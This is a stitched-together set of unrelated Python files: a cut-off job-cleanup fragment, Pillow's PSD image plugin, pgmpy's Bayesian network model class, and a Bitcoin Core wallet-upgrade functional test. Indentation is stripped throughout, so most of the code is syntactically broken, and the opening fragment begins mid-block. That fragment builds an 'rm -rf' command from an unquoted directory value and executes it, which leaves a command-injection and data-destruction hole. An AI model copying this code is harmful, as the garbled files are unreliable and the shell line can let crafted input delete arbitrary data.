rm_cmd = 'rm -rf %s' % job['dir']
conn.execute(rm_cmd)
except EOFError:
# Try again
task.retry(countdown=5)
|
|
#
# The Python Imaging Library
# $Id$
#
# Adobe PSD 2.5/3.0 file handling
#
# History:
# 1995-09-01 fl Created
# 1997-01-03 fl Read most PSD images
# 1997-01-18 fl Fixed P and CMYK support
# 2001-10-21 fl Added seek/tell support (for layers)
#
# Copyright (c) 1997-2001 by Secret Labs AB.
# Copyright (c) 1995-2001 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import io
from . import Image, ImageFile, ImagePalette
from ._binary import i8, i16be as i16, i32be as i32
MODES = {
# (photoshop mode, bits) -> (pil mode, required channels)
(0, 1): ("1", 1),
(0, 8): ("L", 1),
(1, 8): ("L", 1),
(2, 8): ("P", 1),
(3, 8): ("RGB", 3),
(4, 8): ("CMYK", 4),
(7, 8): ("L", 1), # FIXME: multilayer
(8, 8): ("L", 1), # duotone
(9, 8): ("LAB", 3),
}
# --------------------------------------------------------------------
# read PSD images
def _accept(prefix):
return prefix[:4] == b"8BPS"
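# Small usage sketch (illustrative byte strings, not part of the original
# plugin): a PSD file is recognized purely by its 4-byte ASCII signature;
# version and header fields are validated later in _open.
def _accept_example():
    assert _accept(b"8BPS\x00\x01")
    assert not _accept(b"\x89PNG\r\n")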
##
# Image plugin for Photoshop images.
class PsdImageFile(ImageFile.ImageFile):
format = "PSD"
format_description = "Adobe Photoshop"
_close_exclusive_fp_after_loading = False
def _open(self):
read = self.fp.read
#
# header
s = read(26)
if not _accept(s) or i16(s[4:]) != 1:
raise SyntaxError("not a PSD file")
psd_bits = i16(s[22:])
psd_channels = i16(s[12:])
psd_mode = i16(s[24:])
mode, channels = MODES[(psd_mode, psd_bits)]
if channels > psd_channels:
raise OSError("not enough channels")
self.mode = mode
self._size = i32(s[18:]), i32(s[14:])
#
# color mode data
size = i32(read(4))
if size:
data = read(size)
if mode == "P" and size == 768:
self.palette = ImagePalette.raw("RGB;L", data)
#
# image resources
self.resources = []
size = i32(read(4))
if size:
# load resources
end = self.fp.tell() + size
while self.fp.tell() < end:
read(4) # signature
id = i16(read(2))
name = read(i8(read(1)))
if not (len(name) & 1):
read(1) # padding
data = read(i32(read(4)))
if len(data) & 1:
read(1) # padding
self.resources.append((id, name, data))
if id == 1039: # ICC profile
self.info["icc_profile"] = data
#
# layer and mask information
self.layers = []
size = i32(read(4))
if size:
end = self.fp.tell() + size
size = i32(read(4))
if size:
self.layers = _layerinfo(self.fp)
self.fp.seek(end)
self.n_frames = len(self.layers)
self.is_animated = self.n_frames > 1
#
# image descriptor
self.tile = _maketile(self.fp, mode, (0, 0) + self.size, channels)
# keep the file open
self.__fp = self.fp
self.frame = 1
self._min_frame = 1
def seek(self, layer):
if not self._seek_check(layer):
return
# seek to given layer (1..max)
try:
name, mode, bbox, tile = self.layers[layer - 1]
self.mode = mode
self.tile = tile
self.frame = layer
self.fp = self.__fp
return name, bbox
except IndexError as e:
raise EOFError("no such layer") from e
def tell(self):
# return layer number (0=image, 1..max=layers)
return self.frame
def load_prepare(self):
# create image memory if necessary
if not self.im or self.im.mode != self.mode or self.im.size != self.size:
self.im = Image.core.fill(self.mode, self.size, 0)
# create palette (optional)
if self.mode == "P":
Image.Image.load(self)
def _close__fp(self):
try:
if self.__fp != self.fp:
self.__fp.close()
except AttributeError:
pass
finally:
self.__fp = None
def _layerinfo(file):
# read layerinfo block
layers = []
read = file.read
for i in range(abs(i16(read(2)))):
# bounding box
y0 = i32(read(4))
x0 = i32(read(4))
y1 = i32(read(4))
x1 = i32(read(4))
# image info
info = []
mode = []
types = list(range(i16(read(2))))
if len(types) > 4:
continue
for i in types:
type = i16(read(2))
if type == 65535:
m = "A"
else:
m = "RGBA"[type]
mode.append(m)
size = i32(read(4))
info.append((m, size))
# figure out the image mode
mode.sort()
if mode == ["R"]:
mode = "L"
elif mode == ["B", "G", "R"]:
mode = "RGB"
elif mode == ["A", "B", "G", "R"]:
mode = "RGBA"
else:
mode = None # unknown
# skip over blend flags and extra information
read(12) # filler
name = ""
size = i32(read(4)) # length of the extra data field
combined = 0
if size:
data_end = file.tell() + size
length = i32(read(4))
if length:
file.seek(length - 16, io.SEEK_CUR)
combined += length + 4
length = i32(read(4))
if length:
file.seek(length, io.SEEK_CUR)
combined += length + 4
length = i8(read(1))
if length:
# Don't know the proper encoding,
# Latin-1 should be a good guess
name = read(length).decode("latin-1", "replace")
combined += length + 1
file.seek(data_end)
layers.append((name, mode, (x0, y0, x1, y1)))
# get tiles
i = 0
for name, mode, bbox in layers:
tile = []
for m in mode:
t = _maketile(file, m, bbox, 1)
if t:
tile.extend(t)
layers[i] = name, mode, bbox, tile
i += 1
return layers
def _maketile(file, mode, bbox, channels):
tile = None
read = file.read
compression = i16(read(2))
xsize = bbox[2] - bbox[0]
ysize = bbox[3] - bbox[1]
offset = file.tell()
if compression == 0:
#
# raw compression
tile = []
for channel in range(channels):
layer = mode[channel]
if mode == "CMYK":
layer += ";I"
tile.append(("raw", bbox, offset, layer))
offset = offset + xsize * ysize
elif compression == 1:
#
# packbits compression
i = 0
tile = []
bytecount = read(channels * ysize * 2)
offset = file.tell()
for channel in range(channels):
layer = mode[channel]
if mode == "CMYK":
layer += ";I"
tile.append(("packbits", bbox, offset, layer))
for y in range(ysize):
offset = offset + i16(bytecount[i : i + 2])
i += 2
file.seek(offset)
if offset & 1:
read(1) # padding
return tile
# --------------------------------------------------------------------
# registry
Image.register_open(PsdImageFile.format, PsdImageFile, _accept)
Image.register_extension(PsdImageFile.format, ".psd")
|
|
#!/usr/bin/env python3
import itertools
from collections import defaultdict
import logging
import networkx as nx
import numpy as np
import pandas as pd
from pgmpy.base import DirectedGraph
from pgmpy.factors import TabularCPD
from pgmpy.independencies import Independencies
from pgmpy.extern.six.moves import range
class BayesianModel(DirectedGraph):
"""
    Base class for Bayesian models.
    A model stores nodes and edges with conditional probability
    distributions (CPDs) and other attributes.
    Models hold directed edges. Self loops are not allowed, nor are
    multiple (parallel) edges.
    Nodes should be strings.
    Edges are represented as links between nodes.
Parameters
----------
data : input graph
Data to initialize graph. If data=None (default) an empty
graph is created. The data can be an edge list, or any
NetworkX graph object.
Examples
--------
Create an empty bayesian model with no nodes and no edges.
>>> from pgmpy.models import BayesianModel
>>> G = BayesianModel()
G can be grown in several ways.
**Nodes:**
Add one node at a time:
>>> G.add_node('a')
Add the nodes from any container (a list, set or tuple or the nodes
from another graph).
>>> G.add_nodes_from(['a', 'b'])
**Edges:**
G can also be grown by adding edges.
Add one edge,
>>> G.add_edge('a', 'b')
a list of edges,
>>> G.add_edges_from([('a', 'b'), ('b', 'c')])
If some edges connect nodes not yet in the model, the nodes
are added automatically. There are no errors when adding
nodes or edges that already exist.
**Shortcuts:**
Many common graph features allow python syntax to speed reporting.
>>> 'a' in G # check if node in graph
True
>>> len(G) # number of nodes in graph
3
"""
def __init__(self, ebunch=None):
super(BayesianModel, self).__init__()
if ebunch:
self.add_edges_from(ebunch)
self.cpds = []
self.cardinalities = defaultdict(int)
def add_edge(self, u, v, **kwargs):
"""
Add an edge between u and v.
The nodes u and v will be automatically added if they are
not already in the graph
Parameters
----------
u,v : nodes
Nodes can be any hashable python object.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> G = BayesianModel()
>>> G.add_nodes_from(['grade', 'intel'])
>>> G.add_edge('grade', 'intel')
"""
if u == v:
raise ValueError('Self loops are not allowed.')
if u in self.nodes() and v in self.nodes() and nx.has_path(self, v, u):
raise ValueError(
'Loops are not allowed. Adding the edge from (%s->%s) forms a loop.' % (u, v))
else:
super(BayesianModel, self).add_edge(u, v, **kwargs)
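# A small comment-only illustration (not from the original docstring) of
# the acyclicity check above: adding an edge that closes a directed cycle
# raises.
#
#   >>> G = BayesianModel([('a', 'b'), ('b', 'c')])
#   >>> G.add_edge('c', 'a')
#   Traceback (most recent call last):
#       ...
#   ValueError: Loops are not allowed. Adding the edge from (c->a) forms a loop.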
def add_cpds(self, *cpds):
"""
Add CPD (Conditional Probability Distribution) to the Bayesian Model.
Parameters
----------
cpds : list, set, tuple (array-like)
List of CPDs which will be associated with the model
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors.CPD import TabularCPD
>>> student = BayesianModel([('diff', 'grades'), ('intel', 'grades')])
>>> grades_cpd = TabularCPD('grades', 3, [[0.1,0.1,0.1,0.1,0.1,0.1],
... [0.1,0.1,0.1,0.1,0.1,0.1],
... [0.8,0.8,0.8,0.8,0.8,0.8]],
... evidence=['diff', 'intel'], evidence_card=[2, 3])
>>> student.add_cpds(grades_cpd)
+------+-----------------------+---------------------+
|diff: | easy | hard |
+------+------+------+---------+------+------+-------+
|intel:| dumb | avg | smart | dumb | avg | smart |
+------+------+------+---------+------+------+-------+
|gradeA| 0.1 | 0.1 | 0.1 | 0.1 | 0.1 | 0.1 |
+------+------+------+---------+------+------+-------+
|gradeB| 0.1 | 0.1 | 0.1 | 0.1 | 0.1 | 0.1 |
+------+------+------+---------+------+------+-------+
|gradeC| 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 |
+------+------+------+---------+------+------+-------+
"""
for cpd in cpds:
if not isinstance(cpd, TabularCPD):
raise ValueError('Only TabularCPD can be added.')
if set(cpd.variables) - set(cpd.variables).intersection(
set(self.nodes())):
raise ValueError('CPD defined on variable not in the model', cpd)
for prev_cpd_index in range(len(self.cpds)):
if self.cpds[prev_cpd_index].variable == cpd.variable:
logging.warning("Replacing existing CPD for {var}".format(var=cpd.variable))
self.cpds[prev_cpd_index] = cpd
break
else:
self.cpds.append(cpd)
def get_cpds(self, node=None):
"""
Returns the cpds that have been added till now to the graph
Parameters
----------
node: any hashable python object (optional)
The node whose CPD we want. If node is not specified, returns all
the CPDs added to the model.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors import TabularCPD
>>> student = BayesianModel([('diff', 'grade'), ('intel', 'grade')])
>>> cpd = TabularCPD('grade', 2, [[0.1, 0.9, 0.2, 0.7],
... [0.9, 0.1, 0.8, 0.3]],
... ['intel', 'diff'], [2, 2])
>>> student.add_cpds(cpd)
>>> student.get_cpds()
"""
if node:
if node not in self.nodes():
raise ValueError('Node not present in the Directed Graph')
for cpd in self.cpds:
if cpd.variable == node:
return cpd
else:
return self.cpds
def remove_cpds(self, *cpds):
"""
Removes the cpds that are provided in the argument.
Parameters
----------
*cpds: TabularCPD, TreeCPD, RuleCPD object
A CPD object on any subset of the variables of the model which
is to be associated with the model.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors import TabularCPD
>>> student = BayesianModel([('diff', 'grade'), ('intel', 'grade')])
>>> cpd = TabularCPD('grade', 2, [[0.1, 0.9, 0.2, 0.7],
... [0.9, 0.1, 0.8, 0.3]],
... ['intel', 'diff'], [2, 2])
>>> student.add_cpds(cpd)
>>> student.remove_cpds(cpd)
"""
for cpd in cpds:
if isinstance(cpd, str):
cpd = self.get_cpds(cpd)
self.cpds.remove(cpd)
def check_model(self):
"""
Check the model for various errors. This method checks for the following
errors.
* Checks if the sum of the probabilities for each state is equal to 1 (tol=0.01).
* Checks if the CPDs associated with nodes are consistent with their parents.
Returns
-------
check: boolean
True if all the checks are passed
"""
for node in self.nodes():
cpd = self.get_cpds(node=node)
if isinstance(cpd, TabularCPD):
evidence = cpd.evidence
parents = self.get_parents(node)
if set(evidence if evidence else []) != set(parents if parents else []):
raise ValueError("CPD associated with %s doesn't have "
"proper parents associated with it." % node)
if not np.allclose(cpd.to_factor().marginalize([node], inplace=False).values.flatten('C'),
np.ones(np.prod(cpd.evidence_card)),
atol=0.01):
raise ValueError('Sum of probabilities of states for node %s'
' is not equal to 1.' % node)
return True
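# A comment-only sketch of what check_model validates, using a hypothetical
# two-node model (exact behaviour for root-node CPDs depends on the
# TabularCPD version in use):
#
#   >>> m = BayesianModel([('rain', 'wet')])
#   >>> wet_cpd = TabularCPD('wet', 2, [[0.9, 0.1], [0.1, 0.9]],
#   ...                      evidence=['rain'], evidence_card=[2])
#   >>> m.add_cpds(wet_cpd)
#   >>> m.check_model()   # raises ValueError if columns don't sum to 1,
#   ...                   # or if a CPD's evidence disagrees with the parents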
def _get_ancestors_of(self, obs_nodes_list):
"""
Returns a set of all ancestors of all the observed nodes.
Parameters
----------
obs_nodes_list: string, list-type
name of all the observed nodes
"""
if not isinstance(obs_nodes_list, (list, tuple)):
obs_nodes_list = [obs_nodes_list]
ancestors_list = set()
nodes_list = set(obs_nodes_list)
while nodes_list:
node = nodes_list.pop()
if node not in ancestors_list:
nodes_list.update(self.predecessors(node))
ancestors_list.add(node)
return ancestors_list
def active_trail_nodes(self, start, observed=None):
"""
Returns all the nodes reachable from start via an active trail.
Parameters
----------
start: Graph node
observed : List of nodes (optional)
If given, the active trail would be computed assuming these nodes to be observed.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_nodes_from(['diff', 'intel', 'grades'])
>>> student.add_edges_from([('diff', 'grades'), ('intel', 'grades')])
>>> student.active_trail_nodes('diff')
{'diff', 'grades'}
>>> student.active_trail_nodes('diff', observed='grades')
{'diff', 'intel'}
References
----------
Details of the algorithm can be found in 'Probabilistic Graphical Models:
Principles and Techniques' - Koller and Friedman,
Page 75, Algorithm 3.1.
"""
if observed:
observed_list = [observed] if isinstance(observed, str) else observed
else:
observed_list = []
ancestors_list = self._get_ancestors_of(observed_list)
# Direction of flow of information
# up -> traversing from a child to a parent (towards ancestors)
# down -> traversing from a parent to a child (towards descendants)
visit_list = set()
visit_list.add((start, 'up'))
traversed_list = set()
active_nodes = set()
while visit_list:
node, direction = visit_list.pop()
if (node, direction) not in traversed_list:
if node not in observed_list:
active_nodes.add(node)
traversed_list.add((node, direction))
if direction == 'up' and node not in observed_list:
for parent in self.predecessors(node):
visit_list.add((parent, 'up'))
for child in self.successors(node):
visit_list.add((child, 'down'))
elif direction == 'down':
if node not in observed_list:
for child in self.successors(node):
visit_list.add((child, 'down'))
if node in ancestors_list:
for parent in self.predecessors(node):
visit_list.add((parent, 'up'))
return active_nodes
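# Comment-only illustration of "explaining away" via the traversal above:
# in the v-structure diff -> grades <- intel, the trail between 'diff' and
# 'intel' is blocked until the collider 'grades' is observed.
#
#   >>> m = BayesianModel([('diff', 'grades'), ('intel', 'grades')])
#   >>> m.active_trail_nodes('diff')
#   {'diff', 'grades'}
#   >>> m.active_trail_nodes('diff', observed='grades')
#   {'diff', 'intel'}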
def local_independencies(self, variables):
"""
Returns an Independencies object containing the local independencies
of each of the variables.
Parameters
----------
variables: str or array like
variables whose local independencies are to be found.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_edges_from([('diff', 'grade'), ('intel', 'grade'),
...                         ('grade', 'letter'), ('intel', 'SAT')])
>>> ind = student.local_independencies('grade')
>>> ind.event1
{'grade'}
>>> ind.event2
{'SAT'}
>>> ind.event3
{'diff', 'intel'}
"""
def dfs(node):
"""
Returns the descendants of a node.
Since there can't be any cycles in a Bayesian network, this is a
very simple dfs which doesn't remember which nodes it has visited.
"""
descendants = []
visit = [node]
while visit:
n = visit.pop()
neighbors = self.neighbors(n)
visit.extend(neighbors)
descendants.extend(neighbors)
return descendants
independencies = Independencies()
for variable in [variables] if isinstance(variables, str) else variables:
independencies.add_assertions([variable, set(self.nodes()) - set(dfs(variable)) -
set(self.get_parents(variable)) - {variable},
set(self.get_parents(variable))])
return independencies
def is_active_trail(self, start, end, observed=None):
"""
Returns True if there is any active trail between start and end node
Parameters
----------
start : Graph Node
end : Graph Node
observed : List of nodes (optional)
If given, the active trail would be computed assuming these nodes to be observed.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_nodes_from(['diff', 'intel', 'grades', 'letter', 'sat'])
>>> student.add_edges_from([('diff', 'grades'), ('intel', 'grades'), ('grades', 'letter'),
... ('intel', 'sat')])
>>> student.is_active_trail('diff', 'intel')
False
>>> student.is_active_trail('grades', 'sat')
True
"""
return end in self.active_trail_nodes(start, observed)
def get_independencies(self, latex=False):
"""
Compute independencies in Bayesian Network.
Parameters
----------
latex: boolean
If latex=True, a latex string of the independence assertions
is returned instead.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_nodes_from(['diff', 'intel', 'grades', 'letter', 'sat'])
>>> student.add_edges_from([('diff', 'grades'), ('intel', 'grades'), ('grades', 'letter'),
... ('intel', 'sat')])
>>> student.get_independencies()
"""
independencies = Independencies()
for start in self.nodes():
for r in range(1, len(self.nodes())):
for observed in itertools.combinations(self.nodes(), r):
independent_variables = self.active_trail_nodes(start, observed=observed)
independent_variables = set(independent_variables) - {start}
if independent_variables:
independencies.add_assertions([start, independent_variables,
observed])
independencies.reduce()
if not latex:
return independencies
else:
return independencies.latex_string()
def to_markov_model(self):
"""
Converts the Bayesian model into a Markov model. The Markov model created
would be the moral graph of the Bayesian model.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> G = BayesianModel([('diff', 'grade'), ('intel', 'grade'),
... ('intel', 'SAT'), ('grade', 'letter')])
>>> mm = G.to_markov_model()
>>> mm.nodes()
['diff', 'grade', 'intel', 'SAT', 'letter']
>>> mm.edges()
[('diff', 'intel'), ('diff', 'grade'), ('intel', 'grade'),
('intel', 'SAT'), ('grade', 'letter')]
"""
from pgmpy.models import MarkovModel
moral_graph = self.moralize()
mm = MarkovModel(moral_graph.edges())
mm.add_factors(*[cpd.to_factor() for cpd in self.cpds])
return mm
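# Comment-only sketch of the moralization above: parents sharing a child
# ('diff' and 'intel' both point at 'grade') get "married" by an undirected
# edge in the resulting Markov model.
#
#   >>> G = BayesianModel([('diff', 'grade'), ('intel', 'grade')])
#   >>> mm = G.to_markov_model()
#   >>> ('diff', 'intel') in mm.edges() or ('intel', 'diff') in mm.edges()
#   True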
def to_junction_tree(self):
"""
Creates a junction tree (or clique tree) for a given Bayesian model.
To convert a Bayesian model into a clique tree, it is first converted
into a Markov model.
For a given Markov model (H), a junction tree (G) is a graph where
1. each node in G corresponds to a maximal clique in H, and
2. each sepset in G separates the variables strictly on one side of
the edge from those on the other.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors import TabularCPD
>>> G = BayesianModel([('diff', 'grade'), ('intel', 'grade'),
... ('intel', 'SAT'), ('grade', 'letter')])
>>> diff_cpd = TabularCPD('diff', 2, [[0.2], [0.8]])
>>> intel_cpd = TabularCPD('intel', 3, [[0.5], [0.3], [0.2]])
>>> grade_cpd = TabularCPD('grade', 3,
... [[0.1,0.1,0.1,0.1,0.1,0.1],
... [0.1,0.1,0.1,0.1,0.1,0.1],
... [0.8,0.8,0.8,0.8,0.8,0.8]],
... evidence=['diff', 'intel'],
... evidence_card=[2, 3])
>>> sat_cpd = TabularCPD('SAT', 2,
... [[0.1, 0.2, 0.7],
... [0.9, 0.8, 0.3]],
... evidence=['intel'], evidence_card=[3])
>>> letter_cpd = TabularCPD('letter', 2,
... [[0.1, 0.4, 0.8],
... [0.9, 0.6, 0.2]],
... evidence=['grade'], evidence_card=[3])
>>> G.add_cpds(diff_cpd, intel_cpd, grade_cpd, sat_cpd, letter_cpd)
>>> jt = G.to_junction_tree()
"""
mm = self.to_markov_model()
return mm.to_junction_tree()
def fit(self, data, estimator_type=None):
"""
Computes the CPD for each node from given data in the form of a pandas DataFrame.
Parameters
----------
data : pandas DataFrame object
A DataFrame object with column names same as the variable names of network
estimator_type: Estimator class
Any pgmpy estimator. If nothing is specified, the default
MaximumLikelihoodEstimator is used.
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianModel
>>> values = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 5)),
... columns=['A', 'B', 'C', 'D', 'E'])
>>> model = BayesianModel([('A', 'B'), ('C', 'B'), ('C', 'D'), ('B', 'E')])
>>> model.fit(values)
>>> model.get_cpds()
[<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e588>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173cb5e10>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e470>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e198>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e2e8>]
"""
from pgmpy.estimators import MaximumLikelihoodEstimator, BaseEstimator
if estimator_type is None:
estimator_type = MaximumLikelihoodEstimator
else:
if not issubclass(estimator_type, BaseEstimator):
raise TypeError("Estimator object should be a valid pgmpy estimator.")
estimator = estimator_type(self, data)
cpds_list = estimator.get_parameters()
self.add_cpds(*cpds_list)
def predict(self, data):
"""
Predicts states of all the missing variables.
Parameters
----------
data : pandas DataFrame object
A DataFrame object with column names same as the variables in the model.
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianModel
>>> values = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 5)),
... columns=['A', 'B', 'C', 'D', 'E'])
>>> train_data = values[:800]
>>> predict_data = values[800:]
>>> model = BayesianModel([('A', 'B'), ('C', 'B'), ('C', 'D'), ('B', 'E')])
>>> model.fit(values)
>>> predict_data = predict_data.copy()
>>> predict_data.drop('E', axis=1, inplace=True)
>>> y_pred = model.predict(predict_data)
>>> y_pred
array([0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1,
1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1,
1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1,
1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1,
1, 1, 1, 0, 0, 0, 1, 0])
"""
from pgmpy.inference import VariableElimination
if set(data.columns) == set(self.nodes()):
raise ValueError("No variable missing in data. Nothing to predict")
elif set(data.columns) - set(self.nodes()):
raise ValueError("data has variables which are not in the model")
missing_variables = set(self.nodes()) - set(data.columns)
pred_values = defaultdict(list)
model_inference = VariableElimination(self)
for index, data_point in data.iterrows():
states_dict = model_inference.map_query(variables=missing_variables, evidence=data_point.to_dict())
for k, v in states_dict.items():
pred_values[k].append(v)
return pd.DataFrame(pred_values, index=data.index)
def get_factorized_product(self, latex=False):
# TODO: refer to IMap class for explanation why this is not implemented.
pass
def is_iequivalent(self, model):
pass
def is_imap(self, independence):
pass
|
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""upgradewallet RPC functional test
Test upgradewallet RPC. Download node binaries:
Requires previous releases binaries, see test/README.md.
Only v0.15.2 and v0.16.3 are required by this test.
"""
import os
import shutil
import struct
from io import BytesIO
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.bdb import dump_bdb_kv
from test_framework.messages import deser_compact_size, deser_string
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_is_hex_string,
sha256sum_file,
)
UPGRADED_KEYMETA_VERSION = 12
def deser_keymeta(f):
ver, create_time = struct.unpack('<Iq', f.read(12))
kp_str = deser_string(f)
seed_id = f.read(20)
fpr = f.read(4)
path_len = 0
path = []
has_key_orig = False
if ver == UPGRADED_KEYMETA_VERSION:
path_len = deser_compact_size(f)
for i in range(0, path_len):
path.append(struct.unpack('<I', f.read(4))[0])
has_key_orig = bool(f.read(1))
return ver, create_time, kp_str, seed_id, fpr, path_len, path, has_key_orig
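# A minimal round-trip sketch (hypothetical values, not exercised by the
# test itself): build a version-12 keymeta record by hand and check that
# deser_keymeta recovers the fields, documenting the layout parsed above.
def _keymeta_roundtrip_example():
    kp = b"m/0'/0'/0'"
    blob = struct.pack('<Iq', UPGRADED_KEYMETA_VERSION, 1600000000)  # version, create_time
    blob += bytes([len(kp)]) + kp  # compact-size-prefixed keypath string
    blob += b'\x00' * 20           # seed id
    blob += b'\x00' * 4            # master key fingerprint
    blob += bytes([3])             # compact-size path length
    blob += struct.pack('<3I', 0x80000000, 0x80000000, 0x80000000)  # hardened m/0'/0'/0'
    blob += b'\x01'                # has_key_orig flag
    ver, _, kp_str, _, _, path_len, path, has_key_orig = deser_keymeta(BytesIO(blob))
    assert ver == UPGRADED_KEYMETA_VERSION and kp_str == kp
    assert path_len == 3 and path == [0x80000000] * 3 and has_key_orig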
class UpgradeWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
["-addresstype=bech32", "-keypool=2"], # current wallet version
["-usehd=1", "-keypool=2"], # v0.16.3 wallet
["-usehd=0", "-keypool=2"] # v0.15.2 wallet
]
self.wallet_names = [self.default_wallet_name, None, None]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
self.skip_if_no_bdb()
self.skip_if_no_previous_releases()
def setup_network(self):
self.setup_nodes()
def setup_nodes(self):
self.add_nodes(self.num_nodes, extra_args=self.extra_args, versions=[
None,
160300,
150200,
])
self.start_nodes()
self.import_deterministic_coinbase_privkeys()
def dumb_sync_blocks(self):
"""
Little helper to sync older wallets.
Notice that v0.15.2's regtest is hardforked, so there is
no sync for it.
v0.15.2 is only being used to test for version upgrade
and master hash key presence.
v0.16.3 is being used to test for version upgrade and balances.
Further info: https://github.com/bitcoin/bitcoin/pull/18774#discussion_r416967844
"""
node_from = self.nodes[0]
v16_3_node = self.nodes[1]
to_height = node_from.getblockcount()
height = self.nodes[1].getblockcount()
for i in range(height, to_height+1):
b = node_from.getblock(blockhash=node_from.getblockhash(i), verbose=0)
v16_3_node.submitblock(b)
assert_equal(v16_3_node.getblockcount(), to_height)
def test_upgradewallet(self, wallet, previous_version, requested_version=None, expected_version=None):
unchanged = expected_version == previous_version
new_version = previous_version if unchanged else expected_version if expected_version else requested_version
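# new_version resolves to: the old version when the upgrade is a no-op,
# otherwise the explicitly expected version, falling back to the requested one.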
old_wallet_info = wallet.getwalletinfo()
assert_equal(old_wallet_info["walletversion"], previous_version)
assert_equal(wallet.upgradewallet(requested_version),
{
"wallet_name": old_wallet_info["walletname"],
"previous_version": previous_version,
"current_version": new_version,
"result": "Already at latest version. Wallet version unchanged." if unchanged else "Wallet upgraded successfully from version {} to version {}.".format(previous_version, new_version),
}
)
assert_equal(wallet.getwalletinfo()["walletversion"], new_version)
def test_upgradewallet_error(self, wallet, previous_version, requested_version, msg):
assert_equal(wallet.getwalletinfo()["walletversion"], previous_version)
assert_equal(wallet.upgradewallet(requested_version),
{
"wallet_name": "",
"previous_version": previous_version,
"current_version": previous_version,
"error": msg,
}
)
assert_equal(wallet.getwalletinfo()["walletversion"], previous_version)
def run_test(self):
self.nodes[0].generatetoaddress(COINBASE_MATURITY + 1, self.nodes[0].getnewaddress())
self.dumb_sync_blocks()
# Sanity check the test framework:
res = self.nodes[0].getblockchaininfo()
assert_equal(res['blocks'], COINBASE_MATURITY + 1)
node_master = self.nodes[0]
v16_3_node = self.nodes[1]
v15_2_node = self.nodes[2]
# Send coins to old wallets for later conversion checks.
v16_3_wallet = v16_3_node.get_wallet_rpc('wallet.dat')
v16_3_address = v16_3_wallet.getnewaddress()
node_master.generatetoaddress(COINBASE_MATURITY + 1, v16_3_address)
self.dumb_sync_blocks()
v16_3_balance = v16_3_wallet.getbalance()
self.log.info("Test upgradewallet RPC...")
# Prepare for copying of the older wallet
node_master_wallet_dir = os.path.join(node_master.datadir, "regtest/wallets", self.default_wallet_name)
node_master_wallet = os.path.join(node_master_wallet_dir, self.default_wallet_name, self.wallet_data_filename)
v16_3_wallet = os.path.join(v16_3_node.datadir, "regtest/wallets/wallet.dat")
v15_2_wallet = os.path.join(v15_2_node.datadir, "regtest/wallet.dat")
split_hd_wallet = os.path.join(v15_2_node.datadir, "regtest/splithd")
self.stop_nodes()
# Make split hd wallet
self.start_node(2, ['-usehd=1', '-keypool=2', '-wallet=splithd'])
self.stop_node(2)
def copy_v16():
node_master.get_wallet_rpc(self.default_wallet_name).unloadwallet()
# Copy the 0.16.3 wallet to the last Bitcoin Core version and open it:
shutil.rmtree(node_master_wallet_dir)
os.mkdir(node_master_wallet_dir)
shutil.copy(
v16_3_wallet,
node_master_wallet_dir
)
node_master.loadwallet(self.default_wallet_name)
def copy_non_hd():
node_master.get_wallet_rpc(self.default_wallet_name).unloadwallet()
# Copy the 0.15.2 non hd wallet to the last Bitcoin Core version and open it:
shutil.rmtree(node_master_wallet_dir)
os.mkdir(node_master_wallet_dir)
shutil.copy(
v15_2_wallet,
node_master_wallet_dir
)
node_master.loadwallet(self.default_wallet_name)
def copy_split_hd():
node_master.get_wallet_rpc(self.default_wallet_name).unloadwallet()
# Copy the 0.15.2 split hd wallet to the last Bitcoin Core version and open it:
shutil.rmtree(node_master_wallet_dir)
os.mkdir(node_master_wallet_dir)
shutil.copy(
split_hd_wallet,
os.path.join(node_master_wallet_dir, 'wallet.dat')
)
node_master.loadwallet(self.default_wallet_name)
self.restart_node(0)
copy_v16()
wallet = node_master.get_wallet_rpc(self.default_wallet_name)
self.log.info("Test upgradewallet without a version argument")
self.test_upgradewallet(wallet, previous_version=159900, expected_version=169900)
# wallet should still contain the same balance
assert_equal(wallet.getbalance(), v16_3_balance)
copy_non_hd()
wallet = node_master.get_wallet_rpc(self.default_wallet_name)
# should have no master key hash before conversion
assert_equal('hdseedid' in wallet.getwalletinfo(), False)
self.log.info("Test upgradewallet with explicit version number")
self.test_upgradewallet(wallet, previous_version=60000, requested_version=169900)
# after conversion master key hash should be present
assert_is_hex_string(wallet.getwalletinfo()['hdseedid'])
